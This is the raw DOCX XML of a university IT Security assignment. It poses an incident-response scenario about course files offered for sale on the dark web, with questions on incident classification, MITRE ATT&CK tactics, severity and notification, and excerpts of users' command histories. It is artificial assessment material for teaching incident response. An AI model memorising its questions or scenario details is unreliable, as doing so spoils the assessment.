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F264" w14:textId="77777777" w:rsidR="00E92820" w:rsidRPr="00E92820" w:rsidRDefault="00E92820" w:rsidP="00E92820">
      <w:pPr>
        <w:spacing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36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Aptos" w:eastAsia="DengXian" w:hAnsi="Aptos" w:cs="Times New Roman"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660291" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="7CC8F178" wp14:editId="50224647">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>0</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-92075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="895985" cy="1771015"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:wrapNone/>
            <wp:docPr id="5" name="image1.jpeg" descr="http://www.swinburne.edu.my/images/2013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http://www.swinburne.edu.my/images/2013/logo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985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2820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t xml:space="preserve">Swinburne University of Technology Hawthorn Campus </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:br/>
        <w:t>Department of Computing Technologies</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FCF95AF" w14:textId="77777777" w:rsidR="00E92820" w:rsidRPr="00E92820" w:rsidRDefault="00E92820" w:rsidP="00E92820">
      <w:pPr>
        <w:widowControl w:val="0"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:spacing w:before="7" w:after="0" w:line="240" w:lineRule="auto"/>
        <w:ind w:right="56"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Calibri" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19AE2CA0" w14:textId="77777777" w:rsidR="00E92820" w:rsidRDefault="00E92820" w:rsidP="00E92820">
      <w:pPr>
        <w:spacing w:before="1"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28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>COS</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>30015</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>IT Security</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56EC9A65" w14:textId="77777777" w:rsidR="00E92820" w:rsidRPr="00E92820" w:rsidRDefault="00E92820" w:rsidP="00E92820">
      <w:pPr>
        <w:spacing w:before="1" w:line="256" w:lineRule="auto"/>
        <w:ind w:left="1701" w:right="56"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="06BE49C2" w14:textId="36B1A332" w:rsidR="00DA0F94" w:rsidRDefault="00E92820" w:rsidP="00E92820">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Assignment </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:lang w:eastAsia="zh-CN"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Semester 2, 202</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="DengXian" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:i/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FF30814" w14:textId="77777777" w:rsidR="00E92820" w:rsidRDefault="00E92820">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="10910558" w14:textId="5921C798" w:rsidR="00534B4E" w:rsidRPr="00E92820" w:rsidRDefault="00534B4E">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E92820">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Part A</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36331449" w14:textId="6EF65271" w:rsidR="002364CB" w:rsidRDefault="6C42F3F5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">COS30015 teachers </w:t>
      </w:r>
      <w:r w:rsidR="003E08A9" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ha</w:t>
      </w:r>
      <w:r w:rsidR="002479C4">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ve requested</w:t>
      </w:r>
      <w:r w:rsidR="003E08A9" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="57010839" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>students to help assist with</w:t>
      </w:r>
      <w:r w:rsidR="002364CB" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> unfolding cyber incident. </w:t>
      </w:r>
      <w:r w:rsidR="26FCFC16" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Y</w:t>
      </w:r>
      <w:r w:rsidR="002364CB" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>our help</w:t>
      </w:r>
      <w:r w:rsidR="5E3590FF" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> is needed</w:t>
      </w:r>
      <w:r w:rsidR="002364CB" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to understand what has occurred in the incident to recover. To </w:t>
      </w:r>
      <w:r w:rsidR="0085653B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>make this process easier</w:t>
      </w:r>
      <w:r w:rsidR="002364CB" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> they have collected a range of artefacts across their environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EEE6233" w14:textId="1974CC67" w:rsidR="00534B4E" w:rsidRDefault="77B602A9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">COS30015 </w:t>
      </w:r>
      <w:r w:rsidR="00534B4E" w:rsidRPr="67E59C76">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>has provided their network topology to assist with the analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C845C58" w14:textId="6E131E41" w:rsidR="00534B4E" w:rsidRDefault="006609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7CA0BE" wp14:editId="7DE0AF33">
            <wp:extent cx="5731510" cy="3003550"/>
            <wp:effectExtent l="0" t="0" r="2540" b="6350"/>
            <wp:docPr id="2134848334" name="Picture 1" descr="A diagram of a computer networ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7C1CA05-C78A-4DA6-B131-7B876096F1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8334" name="Picture 1" descr="A diagram of a computer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5BA" w14:textId="15167758" w:rsidR="002364CB" w:rsidRDefault="00236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Analyse the following artefacts and answer the associated questions. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDD1BE4" w14:textId="77777777" w:rsidR="002364CB" w:rsidRDefault="002364CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="131C08D1" w14:textId="56EDCEB2" w:rsidR="5AF05E47" w:rsidRPr="00465A86" w:rsidRDefault="5AF05E47" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr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A suspicious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4CB" w14:paraId="4CB25AF4" w14:textId="77777777" w:rsidTr="67E59C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="48523F50" w14:textId="26256260" w:rsidR="002364CB" w:rsidRDefault="00F998D8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A </w:t>
            </w:r>
            <w:r w:rsidR="2D22B823" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>staff member</w:t>
            </w:r>
            <w:r w:rsidR="39EB23D6" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">, </w:t>
            </w:r>
            <w:r w:rsidR="507F151E" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>Dr Yas</w:t>
            </w:r>
            <w:r w:rsidR="39EB23D6" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>,</w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> has reported </w:t>
            </w:r>
            <w:r w:rsidR="355DAC06" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>a suspicious posting on the dark web</w:t>
            </w:r>
            <w:r w:rsidR="0ABE0EF6" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="23047C21" w14:textId="77777777" w:rsidR="00451AC8" w:rsidRDefault="00451AC8">
            <w:pPr>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="1A4F9BFB" w14:textId="4231648B" w:rsidR="009B4881" w:rsidRDefault="006E3B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EAF272" wp14:editId="7F640A54">
                  <wp:extent cx="5731510" cy="2632075"/>
                  <wp:effectExtent l="0" t="0" r="2540" b="0"/>
                  <wp:docPr id="69401638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694A3D9-1245-4151-92B1-5161F65AA6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63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05035" w14:textId="6707755C" w:rsidR="00451AC8" w:rsidRDefault="00451AC8" w:rsidP="3BF12F61">
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
          </w:p>
          <w:p w14:paraId="628969F2" w14:textId="0C9A2195" w:rsidR="00451AC8" w:rsidRDefault="7FAB4E49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I</w:t>
            </w:r>
            <w:r w:rsidR="00451AC8" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>t appears</w:t>
            </w:r>
            <w:r w:rsidR="6F9C6E09" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> to be a dark web forum post claiming that COS30015 resources have been stolen</w:t>
            </w:r>
            <w:r w:rsidR="2DE9AC5D" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> a</w:t>
            </w:r>
            <w:r w:rsidR="6F9C6E09" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>nd are for sale.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="002364CB" w14:paraId="5EEA0E17" w14:textId="77777777" w:rsidTr="67E59C76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5CF5614A" w14:textId="242EA313" w:rsidR="5D1EDEA1" w:rsidRDefault="5D1EDEA1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lastRenderedPageBreak/>
              <w:t>What type of incident does this initial appear to be?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="47A082C6" w14:textId="34024074" w:rsidR="002364CB" w:rsidRDefault="00451AC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</w:t>
            </w:r>
            <w:r w:rsidR="1021C965" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>would be your first recommendations be</w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="253B9064" w14:textId="556F6846" w:rsidR="00451AC8" w:rsidRPr="00451AC8" w:rsidRDefault="00451AC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</w:t>
            </w:r>
            <w:r w:rsidR="39EB23D6" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">main </w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">MITRE ATT&amp;CK </w:t>
            </w:r>
            <w:r w:rsidR="4187A8EE" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>t</w:t>
            </w:r>
            <w:r w:rsidR="6A1E288A" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">actic </w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>is associated with this incident type?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="02BF1E92" w14:textId="2E001FDF" w:rsidR="00451AC8" w:rsidRPr="00451AC8" w:rsidRDefault="2320D504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What resources would you ask to view from COS30015 </w:t>
            </w:r>
            <w:r w:rsidR="00960B13">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>team</w:t>
            </w:r>
            <w:r w:rsidR="776D2378" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="71582E03" w14:textId="55D36AB4" w:rsidR="00451AC8" w:rsidRPr="00451AC8" w:rsidRDefault="776D2378" w:rsidP="67E59C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Which government </w:t>
            </w:r>
            <w:r w:rsidR="5E15253C" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>commissioner</w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> might need to be alerted given potential data </w:t>
            </w:r>
            <w:r w:rsidR="1054A1DF" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>sensitivities</w:t>
            </w:r>
            <w:r w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0F606ACD" w14:textId="77777777" w:rsidR="002364CB" w:rsidRDefault="002364CB">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="07A1D1F7" w14:textId="01EC3B44" w:rsidR="6572C511" w:rsidRPr="00465A86" w:rsidRDefault="6572C511" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr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It’s a 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67E59C76" w14:paraId="189EFF30" w14:textId="77777777" w:rsidTr="67E59C76">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="0DE87898" w14:textId="721180D0" w:rsidR="6572C511" w:rsidRDefault="6572C511" w:rsidP="67E59C76">
            <w:p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The file hashes which were included in the dark web post have been </w:t>
            </w:r>
            <w:r w:rsidR="080E624F" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>identified within the environment. This confirms the legitimacy of the data. Looking at the incident response plan,</w:t>
            </w:r>
            <w:r w:rsidR="63BD8DFF" w:rsidRPr="67E59C76">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> a decision needs to be made if an incident is to be declared.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="28E1F543" w14:textId="06C38A3A" w:rsidR="63BD8DFF" w:rsidRDefault="63BD8DFF">
            <w:r>
              <w:rPr>
                <w:noProof/>
              </w:rPr>
              <w:drawing>
                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="5268475B" wp14:editId="347CB647">
                  <wp:extent cx="5581650" cy="2762250"/>
                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
                  <wp:docPr id="1909221517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3918FE-C680-4707-8596-F33BE8DE055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2151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7E59C76" w14:paraId="40F183C4" w14:textId="77777777" w:rsidTr="67E59C76">
        <w:trPr>
          <w:trHeight w:val="300"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4B922ECA" w14:textId="2AB15A2D" w:rsidR="63BD8DFF" w:rsidRDefault="63BD8DFF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 xml:space="preserve">Would the current information designate an incident? </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="67E6E1BD" w14:textId="70DD4191" w:rsidR="63BD8DFF" w:rsidRDefault="63BD8DFF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 severity would you potentially assign?</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="4686B637" w14:textId="732953FB" w:rsidR="0648CA63" w:rsidRDefault="0648CA63" w:rsidP="67E59C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 potential next steps would you recommend?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4A742BB3" w14:textId="37F82AE3" w:rsidR="67E59C76" w:rsidRDefault="67E59C76" w:rsidP="67E59C76">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1F8175C2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A364E62" w14:textId="7D1E4D45" w:rsidR="71180FE4" w:rsidRPr="00465A86" w:rsidRDefault="71180FE4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Command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27DD" w14:paraId="30834E34" w14:textId="77777777" w:rsidTr="0053454A">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9016" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F651937" w14:textId="0E4AAB33" w:rsidR="00E027DD" w:rsidRDefault="00F846D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teachers know the files exist on one server only</w:t>
            </w:r>
            <w:r w:rsidR="001A449A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>, the File Server</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">. They have obtained the </w:t>
            </w:r>
            <w:r w:rsidR="00064F3F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>command history of th</w:t>
            </w:r>
            <w:r w:rsidR="0006300A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">ree </w:t>
            </w:r>
            <w:r w:rsidR="007A5DE9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>users</w:t>
            </w:r>
            <w:r w:rsidR="0006300A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:r w:rsidR="00064F3F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve">with access to that </w:t>
            </w:r>
            <w:r w:rsidR="0006300A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>server</w:t>
            </w:r>
            <w:r w:rsidR="007A5DE9">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t xml:space="preserve"> from the past </w:t>
            </w:r>
            <w:r w:rsidR="001A449A">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>few weeks</w:t>
            </w:r>
            <w:r w:rsidR="00064F3F">
              <w:rPr>
                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
              </w:rPr>
              <w:t>.</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7910CBB8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891AEB" wp14:editId="43DB370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45085</wp:posOffset>
                      </wp:positionV>
                      <wp:extent cx="5266690" cy="7200900"/>
                      <wp:effectExtent l="0" t="0" r="10160" b="19050"/>
                      <wp:wrapNone/>
                      <wp:docPr id="1932203518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7C92BD3-95E6-4010-ABB5-5E919F5F87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6690" cy="7200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F46028" w14:textId="569C5E25" w:rsidR="00E027DD" w:rsidRDefault="00064F3F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User: </w:t>
                                  </w:r>
                                  <w:r w:rsidR="004A0D88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TA</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="43B02FA2" w14:textId="7154F91C" w:rsidR="004A0D88" w:rsidRDefault="003209E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</w:t>
                                  </w:r>
                                  <w:r w:rsidR="004A0D88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ano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/teaching/COS30015/2025/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Assignments/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A1_Marks.txt</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="579671D9" w14:textId="71BB9CFE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nano /teaching/COS30015/2025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/Assignments/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A1_Marks.txt</w:t>
                                  </w:r>
                                </w:p>
                                <w:p w14:paraId="5FB73957" w14:textId="77777777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</w:p>
